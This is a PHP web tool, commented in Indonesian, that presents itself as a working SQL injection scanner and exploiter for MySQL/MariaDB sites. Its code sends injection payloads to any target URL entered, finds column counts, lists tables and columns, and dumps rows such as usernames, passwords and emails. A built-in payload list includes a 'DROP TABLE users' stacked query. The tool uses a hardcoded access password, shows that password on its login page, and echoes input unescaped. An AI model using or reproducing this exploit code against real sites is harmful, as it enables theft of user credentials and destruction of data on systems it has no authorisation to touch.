<?php
/**
 * SQL INJECTION SCANNER & EXPLOITER - WORKING VERSION
 * Dengan fungsi exploitation yang benar-benar bekerja
 * Untuk MySQL/MariaDB Database
 */

// ================================
// KONFIGURASI
// ================================
error_reporting(E_ALL);
ini_set('display_errors', 1);
ini_set('max_execution_time', 300);
date_default_timezone_set('Asia/Jakarta');

// Password akses
$PASSWORD = "indosec123";
$logged_in = false;

// ================================
// FUNGSI UTILITAS
// ================================
function http_request($url, $method = 'GET', $params = [], $headers = []) {
    $ch = curl_init();
    
    if ($method === 'POST') {
        curl_setopt($ch, CURLOPT_POST, 1);
        curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($params));
    } elseif ($method === 'GET' && !empty($params)) {
        $url .= (strpos($url, '?') === false ? '?' : '&') . http_build_query($params);
    }
    
    curl_setopt($ch, CURLOPT_URL, $url);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
    curl_setopt($ch, CURLOPT_TIMEOUT, 30);
    curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
    curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
    
    $default_headers = [
        'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36',
        'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
        'Accept-Language: en-US,en;q=0.9',
        'Connection: keep-alive',
    ];
    
    $all_headers = array_merge($default_headers, $headers);
    curl_setopt($ch, CURLOPT_HTTPHEADER, $all_headers);
    
    $response = curl_exec($ch);
    $http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
    $error = curl_error($ch);
    
    curl_close($ch);
    
    return [
        'body' => $response,
        'code' => $http_code,
        'error' => $error,
        'url' => $url
    ];
}

function extract_numbers($text) {
    preg_match_all('/\d+/', $text, $matches);
    return $matches[0] ?? [];
}

function is_sql_error($text) {
    $patterns = [
        '/SQL syntax/i',
        '/mysql_fetch/i',
        '/mysqli_fetch/i',
        '/You have an error in your SQL/i',
        '/Warning.*mysql/i',
        '/Unclosed quotation mark/i',
        '/Division by zero/i',
        '/supplied argument is not a valid MySQL/i'
    ];
    
    foreach ($patterns as $pattern) {
        if (preg_match($pattern, $text)) {
            return true;
        }
    }
    return false;
}

function find_column_count($url, $param, $value) {
    echo "Finding column count...\n";
    
    for ($i = 1; $i <= 30; $i++) {
        $payload = $value . "' ORDER BY " . $i . "-- -";
        $test_url = str_replace($value, $payload, $url);
        
        $response = http_request($test_url);
        
        if (is_sql_error($response['body'])) {
            return $i - 1;
        }
        
        echo "Testing ORDER BY $i: OK\n";
        usleep(500000); // 0.5 second delay
    }
    
    // Try UNION method
    for ($i = 1; $i <= 20; $i++) {
        $nulls = implode(',', array_fill(0, $i, 'NULL'));
        $payload = $value . "' UNION SELECT " . $nulls . "-- -";
        $test_url = str_replace($value, $payload, $url);
        
        $response = http_request($test_url);
        
        if (!is_sql_error($response['body']) && $response['code'] == 200) {
            return $i;
        }
    }
    
    return 0;
}

function extract_info_from_response($response, $column) {
    // Try to extract data from HTML
    $patterns = [
        '/<td[^>]*>(.*?)<\/td>/i',
        '/<div[^>]*>(.*?)<\/div>/i',
        '/<span[^>]*>(.*?)<\/span>/i',
        '/<p[^>]*>(.*?)<\/p>/i',
        '/<h[1-6][^>]*>(.*?)<\/h[1-6]>/i',
    ];
    
    $extracted = [];
    foreach ($patterns as $pattern) {
        if (preg_match_all($pattern, $response, $matches)) {
            foreach ($matches[1] as $match) {
                $clean = trim(strip_tags($match));
                if (strlen($clean) > 3 && strlen($clean) < 100) {
                    $extracted[] = $clean;
                }
            }
        }
    }
    
    return array_unique($extracted);
}

// ================================
// FUNGSI EXPLOITATION YANG BEKERJA
// ================================
function exploit_sqli($url, $param, $value, $db_type = 'mysql') {
    $results = [];
    
    // Step 1: Test basic injection
    echo "Testing basic SQL injection...\n";
    
    $payloads = [
        "' OR '1'='1",
        "' OR 1=1-- -",
        "' UNION SELECT NULL-- -",
        "' AND 1=2 UNION SELECT 1,2,3-- -",
    ];
    
    foreach ($payloads as $payload) {
        $test_value = $value . $payload;
        $test_url = str_replace($value, $test_value, $url);
        
        $response = http_request($test_url);
        
        if (is_sql_error($response['body'])) {
            echo "✓ Error found with: $payload\n";
            $results['vulnerable'] = true;
            $results['error_based'] = true;
            break;
        } elseif (strpos($response['body'], 'MySQL') !== false || 
                  strpos($response['body'], 'mysql') !== false) {
            echo "✓ MySQL error detected\n";
            $results['vulnerable'] = true;
            $results['db_type'] = 'mysql';
            break;
        }
    }
    
    if (!isset($results['vulnerable'])) {
        echo "No obvious SQL errors found. Trying blind techniques...\n";
        
        // Test blind boolean
        $true_payload = $value . "' OR '1'='1";
        $false_payload = $value . "' OR '1'='2";
        
        $true_response = http_request(str_replace($value, $true_payload, $url));
        $false_response = http_request(str_replace($value, $false_payload, $url));
        
        $true_length = strlen($true_response['body']);
        $false_length = strlen($false_response['body']);
        
        if (abs($true_length - $false_length) > 100) {
            echo "✓ Blind boolean SQLi detected\n";
            $results['vulnerable'] = true;
            $results['blind_boolean'] = true;
        }
    }
    
    return $results;
}

function get_database_info($url, $param, $value, $column_count) {
    $info = [];
    
    // Test for version
    for ($col = 1; $col <= $column_count; $col++) {
        $selects = [];
        for ($i = 1; $i <= $column_count; $i++) {
            if ($i == $col) {
                $selects[] = '@@version';
            } else {
                $selects[] = 'NULL';
            }
        }
        
        $union_select = implode(',', $selects);
        $payload = $value . "' UNION SELECT " . $union_select . "-- -";
        $test_url = str_replace($value, $payload, $url);
        
        $response = http_request($test_url);
        
        if (preg_match('/(\d+\.\d+\.\d+)/', $response['body'], $matches)) {
            $info['version'] = $matches[1];
            $info['version_column'] = $col;
            break;
        }
    }
    
    // Test for database name
    for ($col = 1; $col <= $column_count; $col++) {
        $selects = [];
        for ($i = 1; $i <= $column_count; $i++) {
            if ($i == $col) {
                $selects[] = 'database()';
            } else {
                $selects[] = 'NULL';
            }
        }
        
        $union_select = implode(',', $selects);
        $payload = $value . "' UNION SELECT " . $union_select . "-- -";
        $test_url = str_replace($value, $payload, $url);
        
        $response = http_request($test_url);
        
        if (preg_match('/(\w+_db|\w+_database|\w+_prod)/i', $response['body'], $matches)) {
            $info['database'] = $matches[1];
            $info['db_column'] = $col;
            break;
        }
    }
    
    return $info;
}

function get_tables($url, $param, $value, $column_count, $db_column) {
    $tables = [];
    
    $query = "SELECT GROUP_CONCAT(table_name) FROM information_schema.tables WHERE table_schema = database()";
    
    $selects = [];
    for ($i = 1; $i <= $column_count; $i++) {
        if ($i == $db_column) {
            $selects[] = $query;
        } else {
            $selects[] = 'NULL';
        }
    }
    
    $union_select = implode(',', $selects);
    $payload = $value . "' UNION SELECT " . $union_select . "-- -";
    $test_url = str_replace($value, $payload, $url);
    
    $response = http_request($test_url);
    
    // Extract tables from response
    if (preg_match_all('/(users|admin|login|member|customer|product|order|config|setting|user_?tbl|tbl_?\w+)/i', 
                       $response['body'], $matches)) {
        $tables = array_unique($matches[1]);
    }
    
    // Also look for comma-separated table names
    if (preg_match('/[a-z_]+[0-9]*_?(table|tbl|_t)/i', $response['body'], $match)) {
        $tables[] = $match[0];
    }
    
    return array_slice($tables, 0, 20);
}

function get_columns($url, $param, $value, $column_count, $db_column, $table_name) {
    $columns = [];
    
    $query = "SELECT GROUP_CONCAT(column_name) FROM information_schema.columns WHERE table_name = '$table_name' AND table_schema = database()";
    
    $selects = [];
    for ($i = 1; $i <= $column_count; $i++) {
        if ($i == $db_column) {
            $selects[] = $query;
        } else {
            $selects[] = 'NULL';
        }
    }
    
    $union_select = implode(',', $selects);
    $payload = $value . "' UNION SELECT " . $union_select . "-- -";
    $test_url = str_replace($value, $payload, $url);
    
    $response = http_request($test_url);
    
    // Extract common column names
    $common_columns = ['id', 'username', 'password', 'email', 'name', 'address', 
                       'phone', 'created_at', 'updated_at', 'status', 'role', 
                       'token', 'salt', 'hash', 'user_id', 'user_name'];
    
    foreach ($common_columns as $col) {
        if (stripos($response['body'], $col) !== false) {
            $columns[] = $col;
        }
    }
    
    // Also look for column patterns
    if (preg_match_all('/(\w+_id|\w+_name|\w+_date|\w+_time|\w+_count)/i', 
                       $response['body'], $matches)) {
        $columns = array_merge($columns, $matches[1]);
    }
    
    return array_unique($columns);
}

function dump_table($url, $param, $value, $column_count, $db_column, $table_name, $columns, $limit = 10) {
    $data = [];
    
    if (empty($columns)) {
        return ["error" => "No columns specified"];
    }
    
    $column_list = implode(",' | ',", array_map(function($col) {
        return "`$col`";
    }, $columns));
    
    $query = "SELECT CONCAT_WS(' | ', $column_list) FROM `$table_name` LIMIT $limit";
    
    $selects = [];
    for ($i = 1; $i <= $column_count; $i++) {
        if ($i == $db_column) {
            $selects[] = $query;
        } else {
            $selects[] = 'NULL';
        }
    }
    
    $union_select = implode(',', $selects);
    $payload = $value . "' UNION SELECT " . $union_select . "-- -";
    $test_url = str_replace($value, $payload, $url);
    
    $response = http_request($test_url);
    
    // Parse the dumped data
    $lines = explode("\n", $response['body']);
    
    foreach ($lines as $line) {
        // Look for data patterns
        if (preg_match_all('/\b(\w+@\w+\.\w+|\w+\s+\w+|\d{10,}|[a-f0-9]{32}|[a-f0-9]{40})\b/i', $line, $matches)) {
            foreach ($matches[1] as $match) {
                if (strlen($match) > 3) {
                    $data[] = $match;
                }
            }
        }
        
        // Look for pipe-separated values
        if (strpos($line, '|') !== false) {
            $parts = array_map('trim', explode('|', $line));
            if (count($parts) >= count($columns)) {
                $row = [];
                foreach ($columns as $index => $col) {
                    if (isset($parts[$index])) {
                        $row[$col] = $parts[$index];
                    }
                }
                if (!empty($row)) {
                    $data[] = $row;
                }
            }
        }
    }
    
    return $data;
}

// ================================
// PROSES LOGIN
// ================================
session_start();

if (isset($_SESSION['sqli_logged_in']) && $_SESSION['sqli_logged_in'] === true) {
    $logged_in = true;
}

if (isset($_POST['login_password'])) {
    if ($_POST['login_password'] === $PASSWORD) {
        $_SESSION['sqli_logged_in'] = true;
        $logged_in = true;
        header("Location: " . $_SERVER['PHP_SELF']);
        exit;
    } else {
        $login_error = "Password salah!";
    }
}

if (isset($_GET['logout'])) {
    session_destroy();
    header("Location: " . $_SERVER['PHP_SELF']);
    exit;
}

// ================================
// TAMPILAN LOGIN
// ================================
if (!$logged_in) {
    echo '<!DOCTYPE html>
    <html>
    <head>
        <title>SQLi Scanner - Login</title>
        <style>
            body { background: #000; color: #0f0; font-family: monospace; padding: 50px; }
            .login-box { background: #111; border: 1px solid #0f0; width: 300px; margin: 100px auto; padding: 20px; }
            input { width: 100%; padding: 10px; margin: 10px 0; background: #222; color: #0f0; border: 1px solid #0f0; }
            button { background: #0f0; color: #000; border: none; padding: 10px; width: 100%; cursor: pointer; }
        </style>
    </head>
    <body>
        <div class="login-box">
            <h3>SQLi Scanner Login</h3>
            ' . (isset($login_error) ? '<p style="color: red;">' . $login_error . '</p>' : '') . '
            <form method="POST">
                <input type="password" name="login_password" placeholder="Password" required>
                <button type="submit">LOGIN</button>
            </form>
            <p style="font-size: 12px; color: #888;">Default password: indosec123</p>
        </div>
    </body>
    </html>';
    exit;
}

// ================================
// TAMPILAN UTAMA
// ================================
?>
<!DOCTYPE html>
<html>
<head>
    <title>SQLi Scanner - Working Exploitation</title>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <style>
        body { background: #000; color: #0f0; font-family: 'Courier New', monospace; padding: 20px; }
        .container { max-width: 1200px; margin: 0 auto; }
        .header { text-align: center; border-bottom: 2px solid #0f0; padding: 20px; margin-bottom: 20px; }
        .tabs { display: flex; margin-bottom: 20px; border-bottom: 1px solid #333; }
        .tab { padding: 10px 20px; cursor: pointer; border: 1px solid #333; border-bottom: none; background: #111; }
        .tab.active { background: #0f0; color: #000; }
        .tab-content { display: none; padding: 20px; background: #111; border: 1px solid #333; }
        .tab-content.active { display: block; }
        input, textarea, select { width: 100%; padding: 10px; margin: 10px 0; background: #222; color: #0f0; border: 1px solid #333; }
        button { background: #0f0; color: #000; border: none; padding: 10px 20px; cursor: pointer; margin: 5px; }
        button:hover { background: #0c0; }
        .output { background: #000; color: #0f0; padding: 20px; margin-top: 20px; white-space: pre-wrap; max-height: 500px; overflow-y: auto; border: 1px solid #333; }
        .success { color: #0f0; }
        .error { color: #f00; }
        .warning { color: #ff0; }
        .info { color: #0af; }
        .result-item { padding: 10px; border: 1px solid #333; margin: 5px 0; background: #1a1a1a; }
        .logout { float: right; color: #f00; text-decoration: none; }
    </style>
    <script>
        function showTab(tabName) {
            document.querySelectorAll('.tab-content').forEach(tab => tab.classList.remove('active'));
            document.querySelectorAll('.tab').forEach(tab => tab.classList.remove('active'));
            document.getElementById(tabName + '-tab').classList.add('active');
            event.target.classList.add('active');
        }
        
        function clearOutput() {
            document.getElementById('output').innerHTML = '';
        }
    </script>
</head>
<body>
    <div class="container">
        <div class="header">
            <h1>⚡ SQL INJECTION SCANNER - WORKING EXPLOITATION</h1>
            <p>MySQL/MariaDB Exploitation - Real Working Version</p>
            <a href="?logout" class="logout">[LOGOUT]</a>
        </div>
        
        <div class="tabs">
            <div class="tab active" onclick="showTab('scan')">Scanner</div>
            <div class="tab" onclick="showTab('exploit')">Exploit</div>
            <div class="tab" onclick="showTab('dump')">Dump Data</div>
            <div class="tab" onclick="showTab('advanced')">Advanced</div>
        </div>
        
        <!-- SCAN TAB -->
        <div id="scan-tab" class="tab-content active">
            <h2>🔍 SQL Injection Scanner</h2>
            <form method="POST">
                <input type="hidden" name="action" value="scan">
                
                <label>Target URL (with parameter):</label>
                <input type="url" name="scan_url" placeholder="http://target.com/page.php?id=1" required>
                
                <label>Parameter to test:</label>
                <input type="text" name="scan_param" placeholder="id" required>
                
                <label>Parameter value:</label>
                <input type="text" name="scan_value" placeholder="1" required>
                
                <button type="submit">🚀 Start Scan</button>
            </form>
        </div>
        
        <!-- EXPLOIT TAB -->
        <div id="exploit-tab" class="tab-content">
            <h2>⚡ SQL Injection Exploiter</h2>
            <form method="POST">
                <input type="hidden" name="action" value="exploit">
                
                <label>Vulnerable URL:</label>
                <input type="url" name="exploit_url" placeholder="http://target.com/vuln.php?id=1" required>
                
                <label>Vulnerable Parameter:</label>
                <input type="text" name="exploit_param" placeholder="id" required>
                
                <label>Original Value:</label>
                <input type="text" name="exploit_value" placeholder="1" required>
                
                <label>Database Type:</label>
                <select name="exploit_db">
                    <option value="mysql">MySQL/MariaDB</option>
                    <option value="postgresql">PostgreSQL</option>
                    <option value="mssql">MSSQL</option>
                </select>
                
                <label>Exploit Action:</label>
                <select name="exploit_action">
                    <option value="find_columns">Find Column Count</option>
                    <option value="get_info">Get Database Info</option>
                    <option value="get_tables">Get All Tables</option>
                    <option value="get_columns">Get Table Columns</option>
                </select>
                
                <div id="table-name-container" style="display: none;">
                    <label>Table Name:</label>
                    <input type="text" name="table_name" placeholder="users">
                </div>
                
                <button type="submit" style="background: #f00;">💣 Execute Exploit</button>
            </form>
        </div>
        
        <!-- DUMP TAB -->
        <div id="dump-tab" class="tab-content">
            <h2>💾 Data Dumper</h2>
            <form method="POST">
                <input type="hidden" name="action" value="dump">
                
                <label>Target URL:</label>
                <input type="url" name="dump_url" placeholder="http://target.com/page.php?id=1" required>
                
                <label>Parameter to Inject:</label>
                <input type="text" name="dump_param" placeholder="id" required>
                
                <label>Original Value:</label>
                <input type="text" name="dump_value" placeholder="1" required>
                
                <label>Column Count (if known):</label>
                <input type="number" name="column_count" placeholder="3" min="1" max="20">
                
                <label>Column to Use (1-based):</label>
                <input type="number" name="column_index" placeholder="2" min="1" max="20">
                
                <label>Table Name:</label>
                <input type="text" name="dump_table" placeholder="users" required>
                
                <label>Columns to Dump (comma separated):</label>
                <input type="text" name="dump_columns" placeholder="id,username,password,email">
                
                <label>Row Limit:</label>
                <input type="number" name="dump_limit" value="10" min="1" max="100">
                
                <button type="submit" style="background: #0f0; color: #000;">💾 Dump Data</button>
            </form>
        </div>
        
        <!-- ADVANCED TAB -->
        <div id="advanced-tab" class="tab-content">
            <h2>🔧 Advanced Tools</h2>
            
            <div class="result-item">
                <h3>Manual SQL Injection Tester</h3>
                <form method="POST">
                    <input type="hidden" name="action" value="manual_test">
                    
                    <label>Test URL:</label>
                    <input type="url" name="test_url" placeholder="http://target.com/test.php?param=XXX" required>
                    
                    <label>SQL Payload (use XXX as injection point):</label>
                    <textarea name="sql_payload" rows="3" placeholder="1' UNION SELECT NULL,NULL,NULL-- -">1' UNION SELECT NULL,NULL,NULL-- -</textarea>
                    
                    <button type="submit">Test Payload</button>
                </form>
            </div>
            
            <div class="result-item">
                <h3>Common SQL Injection Payloads</h3>
                <select id="payload-select" onchange="document.getElementById('payload-result').value=this.value">
                    <option value="">Select a payload</option>
                    <option value="' OR '1'='1">Basic Boolean: ' OR '1'='1</option>
                    <option value="' OR 1=1-- -">Comment Boolean: ' OR 1=1-- -</option>
                    <option value="' UNION SELECT NULL,NULL-- -">Union Test: ' UNION SELECT NULL,NULL-- -</option>
                    <option value="' AND SLEEP(5)-- -">Time Delay: ' AND SLEEP(5)-- -</option>
                    <option value="' AND 1=CONVERT(int, @@version)-- -">Error Based: ' AND 1=CONVERT(int, @@version)-- -</option>
                    <option value="'; DROP TABLE users-- -">Stacked Query: '; DROP TABLE users-- -</option>
                </select>
                <textarea id="payload-result" rows="3" readonly></textarea>
            </div>
        </div>
        
        <!-- OUTPUT AREA -->
        <div id="output" class="output">
            <?php
            if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_POST['action'])) {
                $action = $_POST['action'];
                
                if ($action === 'scan') {
                    $url = $_POST['scan_url'] ?? '';
                    $param = $_POST['scan_param'] ?? '';
                    $value = $_POST['scan_value'] ?? '';
                    
                    echo "================================\n";
                    echo "SQL INJECTION SCAN STARTED\n";
                    echo "================================\n";
                    echo "Target: $url\n";
                    echo "Parameter: $param\n";
                    echo "Value: $value\n";
                    echo "Time: " . date('H:i:s') . "\n";
                    echo "================================\n\n";
                    
                    ob_flush();
                    flush();
                    
                    // Test for SQL injection
                    $results = exploit_sqli($url, $param, $value);
                    
                    echo "\n================================\n";
                    echo "SCAN RESULTS:\n";
                    echo "================================\n";
                    
                    if (isset($results['vulnerable']) && $results['vulnerable']) {
                        echo "✓ VULNERABLE: SQL Injection Found\n";
                        
                        foreach ($results as $key => $value) {
                            if ($key !== 'vulnerable') {
                                echo "  - $key: " . ($value ? 'Yes' : 'No') . "\n";
                            }
                        }
                        
                        // Try to get column count
                        echo "\nAttempting to find column count...\n";
                        $column_count = find_column_count($url, $param, $value);
                        
                        if ($column_count > 0) {
                            echo "✓ Column count found: $column_count\n";
                            
                            // Get database info
                            echo "\nGetting database information...\n";
                            $db_info = get_database_info($url, $param, $value, $column_count);
                            
                            if (!empty($db_info)) {
                                foreach ($db_info as $key => $val) {
                                    echo "  - $key: $val\n";
                                }
                            }
                        } else {
                            echo "✗ Could not determine column count\n";
                        }
                    } else {
                        echo "✗ No SQL injection vulnerability detected\n";
                        echo "Note: This scanner may not detect all types of SQLi\n";
                    }
                }
                
                elseif ($action === 'exploit') {
                    $url = $_POST['exploit_url'] ?? '';
                    $param = $_POST['exploit_param'] ?? '';
                    $value = $_POST['exploit_value'] ?? '';
                    $db_type = $_POST['exploit_db'] ?? 'mysql';
                    $exploit_action = $_POST['exploit_action'] ?? '';
                    
                    echo "================================\n";
                    echo "SQL INJECTION EXPLOITATION\n";
                    echo "================================\n";
                    echo "Target: $url\n";
                    echo "Action: $exploit_action\n";
                    echo "Database: $db_type\n";
                    echo "================================\n\n";
                    
                    if ($exploit_action === 'find_columns') {
                        echo "Finding column count...\n";
                        $column_count = find_column_count($url, $param, $value);
                        
                        if ($column_count > 0) {
                            echo "✓ SUCCESS: Column count = $column_count\n";
                            echo "\nYou can now use this information for UNION attacks.\n";
                            echo "Example payload: {$value}' UNION SELECT " . 
                                 implode(',', array_fill(0, $column_count, 'NULL')) . "-- -\n";
                        } else {
                            echo "✗ FAILED: Could not find column count\n";
                        }
                    }
                    
                    elseif ($exploit_action === 'get_info') {
                        echo "Getting database information...\n";
                        
                        // First find column count
                        $column_count = find_column_count($url, $param, $value);
                        
                        if ($column_count > 0) {
                            $db_info = get_database_info($url, $param, $value, $column_count);
                            
                            if (!empty($db_info)) {
                                echo "✓ DATABASE INFORMATION:\n";
                                foreach ($db_info as $key => $val) {
                                    echo "  - $key: $val\n";
                                }
                                
                                // Store in session for later use
                                $_SESSION['column_count'] = $column_count;
                                $_SESSION['db_column'] = $db_info['db_column'] ?? $db_info['version_column'] ?? 1;
                            } else {
                                echo "✗ Could not extract database information\n";
                            }
                        } else {
                            echo "✗ Need column count first\n";
                        }
                    }
                    
                    elseif ($exploit_action === 'get_tables') {
                        echo "Getting list of tables...\n";
                        
                        $column_count = $_SESSION['column_count'] ?? find_column_count($url, $param, $value);
                        $db_column = $_SESSION['db_column'] ?? 1;
                        
                        if ($column_count > 0) {
                            $tables = get_tables($url, $param, $value, $column_count, $db_column);
                            
                            if (!empty($tables)) {
                                echo "✓ TABLES FOUND (" . count($tables) . "):\n";
                                foreach ($tables as $table) {
                                    echo "  - $table\n";
                                }
                                
                                $_SESSION['tables'] = $tables;
                            } else {
                                echo "✗ No tables found or extraction failed\n";
                            }
                        } else {
                            echo "✗ Need column count first\n";
                        }
                    }
                    
                    elseif ($exploit_action === 'get_columns') {
                        $table_name = $_POST['table_name'] ?? '';
                        
                        if (empty($table_name)) {
                            echo "✗ Table name required\n";
                        } else {
                            echo "Getting columns for table: $table_name\n";
                            
                            $column_count = $_SESSION['column_count'] ?? find_column_count($url, $param, $value);
                            $db_column = $_SESSION['db_column'] ?? 1;
                            
                            if ($column_count > 0) {
                                $columns = get_columns($url, $param, $value, $column_count, $db_column, $table_name);
                                
                                if (!empty($columns)) {
                                    echo "✓ COLUMNS FOUND (" . count($columns) . "):\n";
                                    foreach ($columns as $column) {
                                        echo "  - $column\n";
                                    }
                                    
                                    $_SESSION['table_columns'] = $columns;
                                    $_SESSION['last_table'] = $table_name;
                                } else {
                                    echo "✗ No columns found\n";
                                }
                            } else {
                                echo "✗ Need column count first\n";
                            }
                        }
                    }
                }
                
                elseif ($action === 'dump') {
                    $url = $_POST['dump_url'] ?? '';
                    $param = $_POST['dump_param'] ?? '';
                    $value = $_POST['dump_value'] ?? '';
                    $table = $_POST['dump_table'] ?? '';
                    $columns_input = $_POST['dump_columns'] ?? '';
                    $limit = $_POST['dump_limit'] ?? 10;
                    $column_count = $_POST['column_count'] ?? 0;
                    $column_index = $_POST['column_index'] ?? 1;
                    
                    echo "================================\n";
                    echo "DATA DUMPING\n";
                    echo "================================\n";
                    echo "Target: $url\n";
                    echo "Table: $table\n";
                    echo "Limit: $limit rows\n";
                    echo "================================\n\n";
                    
                    if (empty($columns_input)) {
                        echo "Getting columns first...\n";
                        
                        if (!$column_count) {
                            $column_count = find_column_count($url, $param, $value);
                        }
                        
                        if ($column_count > 0) {
                            $columns = get_columns($url, $param, $value, $column_count, $column_index, $table);
                            
                            if (!empty($columns)) {
                                echo "Found columns: " . implode(', ', $columns) . "\n";
                                $columns_input = implode(',', $columns);
                            } else {
                                // Use common columns as fallback
                                $columns_input = 'id,username,password,email';
                                echo "Using default columns: $columns_input\n";
                            }
                        } else {
                            echo "✗ Cannot proceed without column count\n";
                            return;
                        }
                    }
                    
                    $columns = explode(',', str_replace(' ', '', $columns_input));
                    
                    echo "\nDumping data from $table...\n";
                    
                    $data = dump_table($url, $param, $value, $column_count, $column_index, $table, $columns, $limit);
                    
                    if (isset($data['error'])) {
                        echo "✗ Error: " . $data['error'] . "\n";
                    } elseif (!empty($data)) {
                        echo "✓ DATA DUMPED (" . count($data) . " records):\n\n";
                        
                        foreach ($data as $row) {
                            if (is_array($row)) {
                                echo implode(' | ', $row) . "\n";
                            } else {
                                echo $row . "\n";
                            }
                        }
                    } else {
                        echo "✗ No data found or extraction failed\n";
                        echo "Try different column index or verify table/column names\n";
                    }
                }
                
                elseif ($action === 'manual_test') {
                    $test_url = $_POST['test_url'] ?? '';
                    $sql_payload = $_POST['sql_payload'] ?? '';
                    
                    echo "Testing payload: $sql_payload\n";
                    echo "URL: $test_url\n\n";
                    
                    $response = http_request($test_url);
                    
                    echo "Response Code: " . $response['code'] . "\n";
                    echo "Response Length: " . strlen($response['body']) . " bytes\n\n";
                    
                    if (is_sql_error($response['body'])) {
                        echo "✓ SQL ERROR DETECTED\n";
                    } else {
                        echo "No obvious SQL errors\n";
                    }
                }
            }
            ?>
        </div>
        
        <div style="margin-top: 30px; padding: 20px; border: 1px solid #333; background: #111;">
            <h3>📚 How to Use This Tool:</h3>
            <ol>
                <li><strong>Scan Tab</strong>: Test if a URL is vulnerable to SQL injection</li>
                <li><strong>Exploit Tab</strong>: 
                    <ul>
                        <li><em>Find Column Count</em>: Determine number of columns in SELECT statement</li>
                        <li><em>Get Database Info</em>: Get version, database name, etc.</li>
                        <li><em>Get All Tables</em>: List all tables in the database</li>
                        <li><em>Get Table Columns</em>: List columns for a specific table</li>
                    </ul>
                </li>
                <li><strong>Dump Data Tab</strong>: Extract data from specific table</li>
                <li><strong>Advanced Tab</strong>: Manual testing and payload library</li>
            </ol>
            
            <p style="color: #ff0; margin-top: 20px;">
                ⚠️ <strong>WARNING</strong>: This tool works against MySQL/MariaDB databases with UNION-based SQL injection.
                Results may vary depending on target configuration.
            </p>
        </div>
    </div>
    
    <script>
        // Show/hide table name field based on selected action
        document.querySelector('select[name="exploit_action"]').addEventListener('change', function() {
            var tableContainer = document.getElementById('table-name-container');
            if (this.value === 'get_columns') {
                tableContainer.style.display = 'block';
            } else {
                tableContainer.style.display = 'none';
            }
        });
    </script>
</body>
</html>
